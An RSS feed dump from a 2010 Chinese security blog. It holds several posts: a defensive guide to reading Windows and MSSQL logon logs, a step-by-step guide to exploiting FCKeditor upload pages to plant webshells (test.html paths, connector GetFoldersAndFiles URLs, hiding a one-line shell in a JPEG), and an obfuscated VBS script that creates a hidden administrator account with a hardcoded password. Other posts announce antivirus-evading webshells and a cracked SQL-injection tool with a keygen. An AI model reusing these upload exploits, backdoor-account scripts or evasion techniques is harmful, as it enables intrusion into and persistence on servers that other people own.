<![CDATA[金刀客博客]]>

<![CDATA[金刀客博客]]> http://www.daokers.com/ zh-cn PJBlog3 v3.0.6.170 金刀客博客 http://www.daokers.com/images/logos.gif http://www.daokers.com/ 金刀客博客 http://www.daokers.com/article/original/583.htm <![CDATA[跟刀客一起追寻昨日的足迹]]> daokers@qq.com(admin) Mon,08 Feb 2010 11:06:35 +0800 http://www.daokers.com/default.asp?id=583 作为一个服务器维护者，我的工作就是检查日志。今天我想和大家分享的不是上面的任何一个日志，而是系统的管理日志。在windows 2003系统中，在“开始”菜单“运行”中输入“eventvwr”就可以打开事件查看器，不过一般我们是打开计算机管理，他包含了这个时间查看器，方便管理，在运行中输入“compmgmt.msc”或者右击我的电脑选择“管理”就可以打开计算机管理。事件查看器一般可以查看四类日志，他们分别是“应用程序”，“internet explorer”，“安全性”和“系统”。如图

对于“登陆/注销”来说我们重点关注 “应用程序”和“系统”这2类，“登陆/注销”这种行为一般发生在系统用户和数据库用户，下面以一个例子来具体说明。
比如，我以administrator身份登陆3389端口的远程终端，那么日志记录一般为4条，同时发生。
这个审核是默认开启的，如果想修改可以在运行中输入gpedit.msc打开组策略，在计算机配置-windows设置-安全设置-本地策略-审核策略，即可看到对系统登陆时间的审核。

此类日志保存在“安全性”这一类中

程序代码

事件类型:    审核成功
事件来源:    Security
事件种类:    帐户登录
事件 ID:    680
日期:        2010-2-4
事件:        20:52:37
用户:        TAGggg-DDD3333\administrator
计算机:    TAGggg-DDD3333
描述:
尝试登录的用户:     MICROSOFT_AUTHENTICATION_PACKAGE_V1_0
登录帐户:      administrator
源工作站:     TAGggg-DDD3333
错误代码:     0x0

这个日志是记录尝试登陆的用户，比如你在登陆窗口测试用户名和密码的话，这里都会记载下载，如果你发现有不是系统用户的记录，那么肯定是有人在猜你的用户名了

程序代码

事件类型:    审核成功
事件来源:    Security
事件种类:    登录/注销
事件 ID:    552
日期:        2010-2-4
事件:        20:52:37
用户:        NT AUTHORITY\SYSTEM
计算机:    TAGggg-DDD3333
描述:
使用明确凭据的登录尝试:
登录的用户:
     用户名:    TAGggg-DDD3333$
     域:        WORKGROUP
     登录 ID:        (0x0,0x3E7)
     登录 GUID:    -
凭据被使用的用户:
     目标用户名:    administrator
     目标域:    TAGggg-DDD3333
     目标登录 GUID: -
目标服务器名称:    localhost
目标服务器信息:    localhost
调用方进程 ID:    3224
源网络地址:    142.97.167.96
源端口:    53637

如果登陆成功，那么将在这里记载，如果被人拿到了3389的账号和密码，那么这里将记载ip和方式，很明显这里是使用凭据登陆的。

程序代码

事件类型:    审核成功
事件来源:    Security
事件种类:    登录/注销
事件 ID:    528
日期:        2010-2-4
事件:        20:52:37
用户:        TAGggg-DDD3333\administrator
计算机:    TAGggg-DDD3333
描述:
登录成功:
     用户名:     administrator
     域:         TAGggg-DDD3333
     登录 ID:         (0x0,0x3B5BA)
     登录类型:     10
     登录进程:     User32
     身份验证数据包:     Negotiate
     工作站名:    TAGggg-DDD3333
     登录 GUID:    -
     调用方用户名:    TAGggg-DDD3333$
     调用方域:    WORKGROUP
     调用方登录 ID:    (0x0,0x3E7)
     调用方进程 ID: 3224
     传递服务: -
     源网络地址:    142.97.167.96
     源端口:    53637

这条日志最为重要，他有3个地方说明了登陆方式是远程连接登陆桌面的，第一个地方是登录方式为10，这种方式是远程交互(RemoteInteractive)，说明是通过终端服务、远程桌面或远程协助登陆的；第二个地方就是：登录进程: User32 ，说明是调用了user32.exe进程来登陆的。第三个地址我们在关注一下调用方进程ID，打开任务管理器，可以看到3224的进程是winlogen.exe，这3点都说明了这个日志是远程连接日志

程序代码

事件类型:    审核成功
事件来源:    Security
事件种类:    登录/注销
事件 ID:    576
日期:        2010-2-4
事件:        20:52:37
用户:        TAGggg-DDD3333\administrator
计算机:    TAGggg-DDD3333
描述:
指派给新登录的特殊权限:
     用户名:
     域:
     登录 ID:        (0x0,0x3B5BA)
     特权:    SeSecurityPrivilege
            SeBackupPrivilege
            SeRestorePrivilege
            SeTakeOwnershipPrivilege
            SeDebugPrivilege
            SeSystemEnvironmentPrivilege
            SeLoadDriverPrivilege
            SeImpersonatePrivilege

这个日志是说明给予登陆用户的权限。

好了，上面就是远程登陆的日志了。下面介绍关于mssql的登陆日志。我将mssql的登陆日志分为3类：普通用户登陆，SA登陆和系统用户登陆。
需要开启sql server和windows身份验证，审核全部。点击mssql实例，右击属性，在“安全性”选项卡中选择即可

我们重点关注SA和系统用户的登陆。
mssql的系统用户的登陆日志也保存在“安全性”这类日志中，它的日志和远程登陆相似，主要区别在第三个日志，比如

程序代码

事件类型:    审核成功
事件来源:    Security
事件种类:    登录/注销
事件 ID:    528
日期:        2010-2-4
事件:        21:50:34
用户:        TAGggg-DDD3333\administrator
计算机:    TAGggg-DDD3333
描述:
登录成功:
     用户名:     administrator
     域:         TAGggg-DDD3333
     登录 ID:         (0x0,0x48EF44)
     登录类型:     5
     登录进程:     Advapi
     身份验证数据包:     Negotiate
     工作站名:    TAGggg-DDD3333
     登录 GUID:    -
     调用方用户名:    TAGggg-DDD3333$
     调用方域:    WORKGROUP
     调用方登录 ID:    (0x0,0x3E7)
     调用方进程 ID: 444
     传递服务: -
     源网络地址:    -
     源端口:    -

可以看到这个日志的源网络地址和源端口为空。登录类型为5，了解过windows登陆类型的知道这是以服务的方式来登陆的，登录进程为Advapi ，是因mssql调用了LogonUser（管理员）(API call to LogonUser)”，从而产生了登录事件，调用方进程ID为444即serverices.exe的进程，在看到这个日志的最开始你可能会以为被入侵了，其实不然，当然每个情况不一样，要具体分析，因为像黑洞的远程登陆日志应当也是这样，他也是采用服务来登陆系统。我上面的这个mssql日志比较特殊，因为我是调用administrator来启动mssql的，而不是system，所以第一眼看到这个日志感觉可能中招了的想法是正确的，请仔细勘察。

MSSQL的用户登陆日志都保存在“应用程序”中，普通网站所用数据库用户的登陆，一般为

程序代码

事件类型:    信息
事件来源:    MSSQLSERVER
事件种类:    (4)
事件 ID:    17055
日期:        2010-2-4
事件:        21:41:06
用户:        N/A
计算机:    TAGggg-DDD3333
描述:
18454:
用户 'dbxxxxx' 登录成功。连接: 非信任。

在系统用登陆mssql是在这里也会有记载

程序代码

事件类型:    信息
事件来源:    MSSQLSERVER
事件种类:    (4)
事件 ID:    17055
日期:        2010-2-4
事件:        21:42:37
用户:        TAGggg-DDD3333\administrator
计算机:    TAGggg-DDD3333
描述:
18453:
用户 TAGggg-DDD3333\administrator' 登录成功。连接: 信任。

可能同时还伴随会产生这样一个日志

程序代码

描述:
8128:
使用 'xplog70.dll' 版本 '2000.80.2039' 来执行扩展存储过程 'xp_msver'。

一个返回有关服务器的实际内部版本号的信息以及服务器环境的有关信息的扩展存储

下面说SA的日志。
sa登陆成功日志：

程序代码

事件类型:    信息
事件来源:    MSSQLSERVER
事件种类:    (4)
事件 ID:    17055
日期:        2010-2-4
事件:        21:02:21
用户:        N/A
计算机:    TAGggg-DDD3333
描述:
18454:
用户 'sa' 登录成功。连接: 非信任。

如果看到这样的日志那么你的小心了，SA密码已经被人拿去了。
如果执行游览文件功能，那么会产生这样的日志

程序代码

事件类型:    信息
事件来源:    MSSQLSERVER
事件种类:    (2)
事件 ID:    17055
日期:        2010-2-4
事件:        21:02:45
用户:        N/A
计算机:    TAGggg-DDD3333
描述:
8128:
使用 'xpstar.dll' 版本 '2000.80.2039' 来执行扩展存储过程 'xp_dirtree'。

可爱的dirtree
而产生这一日志的效果如图

已经全在掌控之中了，产生这个效果的原因是没有给SA降权。这些怎么解决以后再说了。好了，这篇小文就到这里了。

daokers

2010.2.4 夜于广州

]]> http://www.daokers.com/article/original/582.htm <![CDATA[FCKeditor风云]]> daokers@qq.com(admin) Fri,05 Feb 2010 12:08:42 +0800 http://www.daokers.com/default.asp?id=582 FCK的问题与IIS的解析漏洞有着密切的关系，自IIS解析漏洞披露后，fck就遭受了新一轮冲击。由于fck对上传文件的扩展名检查不严格，导致了一些畸形文件名文件的上传，比如上面说道的test.asp;z.jpg，而由于IIS解析漏洞的原因，IIS会把这种格式的文件当做动态文件解析。FCK修正了一次之后，又出现了二次上传漏洞，就是第一次会把扩展名中多余的”.“替换成”-“，但是如果再传一次同样的文件，则不替换。对上传文件过滤似乎有所加强，出现invalid file弹窗的几率大为增加，但是还是有办法突破，这都归责于fck的致命问题：上传文件没有重命名！对于突破上传，网上有个朋友介绍了一个相当好的办法，那就是利用edjpgcom插入一句话到图片，这个图片还可以游览，fck根本无法检测出，非常好的一个伪装办法，edjpgcom.exe这个程序刀城有朋友传上来了，在cmd下使用，直接拉图片到程序也是可以的。
前几天遇到一个fck的一个新情况，是什么呢？重命名了，我不是很确认这是官方的版本还是自己修改的版本，FCK把所有的文件都重命名存放，截图看下

可以看到严重的问题，虽然重命名，但是没有过于扩展名，真是奇怪，asp，cer，aspx都可以上传。

测试了一下，aspx可以运行，说明上传不是假的。
本人感觉这个应当是某些网站自己修改了上传页面，才会导致这么大的疏忽，在这也请各个站长注意了。

说到FCK，几个老问题不得不说，虽然是陈年旧事，但是还是被很多站长们常常疏忽。对于FCK我会查找3个页面：fckeditor.html，test.html和browser.html

首先说test.html的问题，看文件名就知道，这是fck的测试文件，可能出于疏忽，作为产品发布了，从此很多使用此编辑器的网站也就存在了这个页面。这个页面非常危险，可以直接上传动态文件。
test.html存在2个不同版本，第一个版本的默认路径是FCKeditor/editor/filemanager/connectors/test.html，这是一个在FCK中比较常见的问题文件。

如图，直接选择本地文件上传，有时候不成功可以多测试几次connector，有时候可能关闭了asp，只开启了aspx；对于resouse type也是一样，或者只是开启了file或者image其中一个类型的上传。怎么获取上传地址呢？已经很明显了，点击”get folders and files“就将返回当前上传文件的地址。

另外一个版本的test.html，相对较少，他的默认路径是FCKeditor/editor/filemanager/upload/test.html

从图片可以看出，上传后会直接返回上传的路径，所以利用非常方便。

下面说fckeditor.html和browser.html，
先说browser.html，他的默认路径一般是FCKeditor/editor/filemanager/browser/default/browser.html?Type=file&Connector=connectors/asp/connector.asp
这里是利用asp连接器，类型选择为”file“，打开后如下图

可以看到下面有一个上传的地方，如果rp没有问题，那么就可以上传成功，那么怎么获取上传之后的地址呢？这是一些朋友迷惑的问题
FCK是利用xml列出文件的，在连接器中有这样一个命令”GetFoldersAndFiles",就是列出文件夹和文件。可以尝试运行下面的命令
editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
如果行的话就会列出文件路径。

另外可以摸石头过河，根据经验瞎猜默认路径；翻一翻网站，找找相似的图片，说不定路径就出来了；再或者试试网页嗅探器。

下面说说fckeditor.html。fckeditor.html的默认路径一般是fckeditor/editor/fckeditor.Html ，就我而言，只有当fckeditor.html无法利用，比如删除了，或者打开是一片空白，我才会查找browser.html。

理由有3：
第一，连接器的选择问题，如果用browser.html，你首先的测试哪一个Connector是可用的。而在fckeditor.html中，如果正常的话他有一个上传图片的功能，点击打开上传图片对话框

可以看到一个”brows server“ 按钮，点击打开之，就会是正确的browser.html，他会自动选择正确的连接器。

第二，上面说到的browser.html中获取上传路径的问题，从上传图片对话框中打开browser.html后，双击列出的文件，就将自动复制地址给”链接“或者“图像”，如上图中所示，在这里为相对路径为/upload/File/24filmru1377.html

第三，他同样具有上传图片的地方，虽然没browse.html方便，可以测试多个类型文件

上传之后，会直接在”图像“栏中显示上传地址。

对于这个FCK的利用就说到这里了，下面说安全

1，首先要删除上面说到的2个test.html，这2个文件对网站有百害而无一利

2，对于文件的上传，我们可以关闭FCK的上传功能。关闭是在各个连接器的config文件中，比如asp连接器，editor/filemanager/browser/default/connectors/asp/config.asp，将config.asp中的ConfigIsEnabled的值设置为False。各个连接都需要关闭！当然最好的办法是删除filemanager这个文件夹，彻底解决FCK的上传，不过这样FCK也就无法上传了

3，如果想使用FCK上传，那么就得修改相应的config文件。限制各个动态文件的上传，重命名文件。

4，如果你有服务器权限，那么取消FCK上传目录的“脚本”权限，虽上传，但是已无法运行。

]]> http://www.daokers.com/article/original/581.htm <![CDATA[点击快速连接打开谷歌出现错误中止操作的解决办法]]> daokers@qq.com(admin) Thu,28 Jan 2010 21:32:16 +0800 http://www.daokers.com/default.asp?id=581
我一直都是用tencent traveler的快速连接功能，最近这一段时间，甚是奇怪，我打开google的快速连接总是出现出错，中止操作，极为郁闷

如图

偶然的机会发现，如果域名不是google.cn则不会这样。我在本地ping了一下，当时的google.cn的ip是74.125.153.99，我在快速连接中修改地址为ip，打开谷歌，则一切正常，

不过首页稍微有点不同，显示“中文简体”，而不是谷歌。

只有一搜索就会跳转到google.cn这个域名去。

但是这时候已经不影响我们的使用了

故此法，共享之

]]> http://www.daokers.com/article/others/580.htm <![CDATA[刀客城-致力于原创性氛围的技术交流平台]]> daokers@qq.com(admin) Tue,19 Jan 2010 22:49:37 +0800 http://www.daokers.com/default.asp?id=580           一直有个梦想就是弄一个平台，和臭味相投的朋友一起来交流学习，这次终于得逞，呵呵，老多朋友支持，认识的，不认识的，都很感谢你，特别是有些朋友为了刀城付出了相当大的劳动，在此致谢了。相聚到一起其实是一件蛮有缘分的事情，希望到刀城能够学到东西，不仅仅是技术上的进步，也希望在做人方面学到经验。多学点知识，少走弯路，就算没有成为优秀的技术员，那也是很大的欣慰了。
       刀城的目标是想做一个原创性较强的坛子，准备在网络攻防，汉化破解，加密解密，服务器安全及病毒分析这些方面展开讨论，有兴趣的朋友就一起来玩玩吧，http://forum.daokers.com  我在刀城等着您......

      ]]> http://www.daokers.com/article/others/579.htm <![CDATA[军情播报-百度DNS被入侵]]> daokers@qq.com(金刀客) Tue,12 Jan 2010 09:38:57 +0800 http://www.daokers.com/default.asp?id=579         没想到百度也被入侵了，今天一大早起来得到的最震惊的消息就是百度被入侵了，新闻已经是铺天盖地，真是2010年开头网络界第一大杯具，看新闻有人推断这可能是伊朗的黑客攻击所致，挂着Iranian Cyber Army的黑页，伊朗电脑军团？
     其实这对百度未免不是好事，塞翁失马焉知非福？说不定就这次时间百度在全球名声大噪呢。
     担忧之，恭喜之..............]]> http://www.daokers.com/article/original/578.htm <![CDATA[雷驰加解密工具]]> daokers@qq.com(金刀客) Thu,07 Jan 2010 20:48:38 +0800 http://www.daokers.com/default.asp?id=578          一个简单的字符转换加密，雷池网站系统使用的较多，姑且称之雷池加密。它加密的原理是对字串的Asc和chr之间的转换。可能有些朋友会遇到bfpms，bfpms>?@之类的加密，那么他就是admin,admin888的加密字符了。

上图

附件下载：

今天一个朋友告诉我说这个文件被卡巴斯基查杀，迅速检查了一下，发现卡巴斯基查杀所有VMProtect.v1.8以上版本保护的软件，只要是这个版本保护的都被视为危险程序，如果在意这些的，请重新下载下，不在意的就无所谓了，绝对不会危害您的电脑。---2010.1.8  10：30    daokers

]]> http://www.daokers.com/article/collection/577.htm <![CDATA[又一经典免费VPN软件-Free VPN by WSC]]> daokers@qq.com(金刀客) Wed,06 Jan 2010 22:53:41 +0800 http://www.daokers.com/default.asp?id=577        找到的这款宝贝就是Free VPN by WSC，和小绿盾相比，有过之而无不及。体积小，速度快，并且我发现虽然说去除广告需要付费，但是我使用时它并没有在页面中插入广告，但是他修改了IE的首页，这个我想大家都有办法去掉。
     必须下载最新版本才能使用，所以请到官方网站下载最新版，他们的官方网站是http://www.thefreevpn.com，软件下载地址http://thefreevpn.com/ifreevpn.exe

下载下来后安装就是，记得在有这个提示时选择"yes“才能安装VPN适配器驱动

安装好后，网络连接就多有ifreevpn的网络连接

没有连接，显示网线拔出状态。

我们启动程序，选择一个vpn服务器，之后点击”connect“，成功连接后，盾牌由先前的浅蓝变为绿色

采用SSL加密协议传输数据，保护您的信息安全。

我对这个vpn的速度进行了一个简单测定，还是很不错的
启用vpn之前的速度测定

启用vpn之后

虽然大为减小，但是对于其它的vpn软件来说已经是相当不错了，另外vpn的这个是在虚拟机中测定的，可能也有一定影响。

好了，这个软件就介绍到这里了，如果觉得好的话就帮我顶顶这篇小文了，:-D

提示：使用VPN，需要开启DHCP Client服务为自动，谢谢Ink兄提醒。

]]> http://www.daokers.com/article/original/576.htm <![CDATA[添加系统用户VBS加密脚本生成工具]]> daokers@qq.com(金刀客) Sat,02 Jan 2010 19:39:04 +0800 http://www.daokers.com/default.asp?id=576 简介：
如果系统删除了net.exe、net1.exe，那么可以试试用这个vbs脚本添加系统用户，它是通过WSCRIPT.NETWORK来添加用户的。
使用方法是复制加密后的代码为vbs文件，之后执行即可；如果你想在cmd中执行，那么请选择“加上echo”，之后复制加密后的代码到cmd中，点击确定就会在当前目录生成你定义的vbs文件。
一个vbs脚本样例：

程序代码

DStr = Array(115,101,116,32,119,115,110,101,116,119,111,114,107,61,67,114,101,97,116,101,79,98,106,101,99,116,40,34,87,83,67,82,73,80,84,46,78,69,84,87,79,82,75,34,41,13,10,111,115,61,34,87,105,110,78,84,58,47,47,34,38,119,115,110,101,116,119,111,114,107,46,67,111,109,112,117,116,101,114,78,97,109,101,13,10,83,101,116,32,111,98,61,71,101,116,79,98,106,101,99,116,40,111,115,41,13,10,83,101,116,32,111,101,61,71,101,116,79,98,106,101,99,116,40,111,115,38,34,47,65,100,109,105,110,105,115,116,114,97,116,111,114,115,44,103,114,111,117,112,34,41,13,10,83,101,116,32,111,100,61,111,98,46,67,114,101,97,116,101,40,34,117,115,101,114,34,44,34,100,97,111,107,101,114,115,34,41,13,10,111,100,46,83,101,116,80,97,115,115,119,111,114,100,32,34,115,100,102,97,115,102,97,115,100,102,35,35,51,54,53,52,34,13,10,111,100,46,83,101,116,73,110,102,111,13,10,83,101,116,32,111,102,61,71,101,116,79,98,106,101,99,116,40,111,115,38,34,47,32,100,97,111,107,101,114,115,34,44,117,115,101,114,41,13,10,111,101,46,97,100,100,32,111,115,38,34,47,32,100,97,111,107,101,114,115,34,13,10)
Function Num2Str(Str):For I=0 To UBound(Str):Num2Str=Num2Str & Chr(Str(I)):Next:End Function
Execute Num2Str(DStr)

2010-1-2
金刀客
http://www.daokers.com

附件下载：

pangolin_3.0.0.1016特别版下载地址：

注册机下载

个人见解：此版本感觉还没有1011好用，经常无故退出。此注册机我不是首发，所以请某某不要见怪。

]]> http://www.daokers.com/article/others/573.htm <![CDATA[“宝木金刀”系列无后门webshell安全处理更新发布]]> daokers@qq.com(金刀客) Tue,29 Dec 2009 22:17:29 +0800 http://www.daokers.com/default.asp?id=573 一直都不怎么关注anti-virus这个问题，既然有那么多朋友提出来，那么我就对这个“宝木金刀”Nobackdoor webshell系列的四个文件全部进行了一次处理，现在在virusacn.org上是全免的，希望大家玩的开心。如果觉得有意思那么就“顶一下”，如果有什么问题就请评论或留言提出来，大家一起交流。

No Backdoor Webshell(宝)-海洋顶端纯净版

No Backdoor Webshell(木)-雨夜孤魂纯净版

No Backdoor Webshell(金)-邪恶忧伤纯净版

No Backdoor Webshell(刀)-No hacker纯净版

]]>